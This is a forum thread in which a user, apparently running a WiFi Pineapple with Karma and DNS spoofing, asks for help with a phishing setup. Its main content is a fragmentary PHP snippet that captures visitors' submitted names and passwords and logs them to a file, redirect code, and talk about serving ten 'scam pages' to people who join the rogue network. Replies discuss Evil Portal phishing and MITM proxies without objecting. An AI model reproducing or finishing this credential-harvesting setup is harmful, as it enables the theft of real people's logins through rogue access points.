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Yes Sure bro. Tnks

What i whant to do is next :

i want to create a index.html page with post asking for the mail and pass. after user will connect and enter details ill just use redirect to google.

will it work ?


Hi again !

After reading several manuals regarding using fish catching i didnt get any luck with it

(maybe coz mark IV and V is different ?)

My target is to redirect all incoming traffic to index.html

anyone can advise what im doing wrong plz ?

my setting is below :



<meta http-equiv="REFRESH" content="0;url=redirect.php">


        $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

        if (strpos($ref, "*")){
                header('Location: index.html');




$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);

        $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;

        $filed = @fopen("/tmp/pineapple-phish.log", "a+");
        @fwrite($filed, "$content\n");

<script type="text/javascript">
function goBack()
<body onload="goBack()">

when client connects to pineapple he getting blank page..

if internet present client is able to use it

Ps: Karma is running

Firmware Version: 2.1.1

PHP Version 5.4.5 System Linux Pineapple 3.3.8 #21 Tue Dec 9 16:16:09 PST 2014 mips Build Date Oct 9 2014 16:09:31

PS: when the client connects to wifi pineapple and entering magic happened..

in any another case i mean if i type google yahoo or whatever im just getting blank screen...

any one can help ??


You're waisting your time with DNSpoof. The spoof success rate is fairly low given most modern browsers cache the correct DNS entries.


You're waisting your time with DNSpoof. The spoof success rate is fairly low given most modern browsers cache the correct DNS entries.

This is true. We do however have a better alternative for this coming soon!

Best regards,


Posted (edited)

Thanks 4 replays

After i made some research i realised 2 week point

1) Can not set up automatic DNS spoof (dips pins etc don't have any decent description i mean set up manual)

2) Browsers.. is another story..

a) Safary 502 Bad Gateway (nginx /1.2.2)

Strange thing is : after i join network from iphone for a second i saw half login screen.. saying captive.apple.com

Tony is name of my network

anyone can explain ??

captive.apple.com anyone can explain ???

b) Opera .. is good.. mobile opera same as standard version


Just read this article



Edited by troter

This is true. We do however have a better alternative for this coming soon!

Best regards,


He speaks of their secret mitm proxy

This? https://mitmproxy.org

Looks fairly simply to configure.


not that specificaly, but seb mentioned in a different thread that they are working on one of their own designed for the mk5! said hoped to have it out before the end of this year, good things to come :D and hopefully with the new sslstrip :D

Posted (edited)

he mentions it in this post


Happens to all of us ;)

All the changes / additions we have made can be found in the changelog on the first page.

In regards to a better dnsspoof, we are still working on our MITM proxy which will hopefully be released before the end of the year.

Otherwise, we'll soon have a hangout where we will discuss future features.

Best regards,


Edited by datahead

i find evil portal to be great at phishing. Depending on how you setup your landing page of course.

Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right?


See my thread on trying to install it.

I would but i cannot view your topics under your profile.....


Correct me if im wrong, but the evil portal only realistically can produce a single phishing page being the landing page. Is this right?

Ish... Some php-fu should be able to determine the domain queried and forward on to an adequate landing page. I haven't tried it myself but knowing nodogsplash, the data required should be there somewhere.


need some advice ..

i got 10 scam pages.. a.html, b.htmlc.html....j.html

redirection is set up..

is it possible to user to browse i-net as normal via internet sharing and triger only on my 10 pages ?

currently i have dns set up to *

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